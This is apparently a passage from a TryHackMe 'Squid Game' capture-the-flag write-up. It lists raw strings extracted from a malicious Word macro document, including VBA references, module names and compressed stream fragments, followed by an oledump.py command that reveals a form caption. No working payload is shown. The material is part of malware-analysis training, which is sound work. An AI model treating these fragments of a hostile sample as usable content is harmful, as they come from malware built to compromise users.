SquidGame
ControlTipText8
SquidGame_Click
CatchMeIfYouCan_Click]r
UserFormN
Documentj
*\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\Program Files (x86)\Common Files\Microsoft Shared\VBA\VBA7.1\VBE7.DLL#Visual Basic For Applications
*\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\Program Files (x86)\Microsoft Office\root\Office16\MSWORD.OLB#Microsoft Word 16.0 Object Library
*\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\Windows\SysWOW64\stdole2.tlb#OLE Automation
*\CNormal
*\CNormal
*\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\MSO.DLL#Microsoft Office 16.0 Object Library
*\G{0D452EE1-E08F-101A-852E-02608C4D0BB4}#2.0#0#C:\Windows\SysWOW64\FM20.DLL#Microsoft Forms 2.0 Object Library
*\G{D267CABC-6B5E-4542-8C9F-D12A8339F5C3}#2.0#0#C:\Users\TESTUS~1\AppData\Local\Temp\VBE\MSForms.exd#Microsoft Forms 2.0 Object Library
ThisDocument
016378006d
ThisDocument
Module1
026378006d
Module1
CatchMeIfYouCan
036378006d
CatchMeIfYouCan
Project
rstd
ole>
\G{00020
430-
0046}#
2.0#0#C:
\Windows
\SysWOW6
e2.tlb
#OLE Aut
omation
ENormal
!Offic
!G{2
DF8D04C-
5BFA-101@B-BDE5
gAjA
ram File
s (x86)\@Common
Microsof
t Shared
\OFFICE1
6\MSO.DL
P 16.
0 Ob
Li`brary
zMSF@Cs>
452EE1-E
1A-8
-02608C4 D0BB4
eFMl20L'B
00}#0
D267CA
BC-6B5E-
4542-8C9
F-D12A83@39F5C3H.U
sers\TES
TUS~1\Ap
pData\Lo
cal\Temp0\VBE
ZB/.e<xd
[U4@"
ThisDoc
umentG
Dodul
Catc
hMeIfYou
CanG
CE@ut@mh
_*qc#(h
bjbjb3b3
P-M|
└─$ ./oledump.py attacker5.doc -s a -S | grep -i caption
Caption = "CobaltStrikeIsEverywhere"
[https://www.papermtn.co.uk/tryhackme-squid-game-attacker-5/]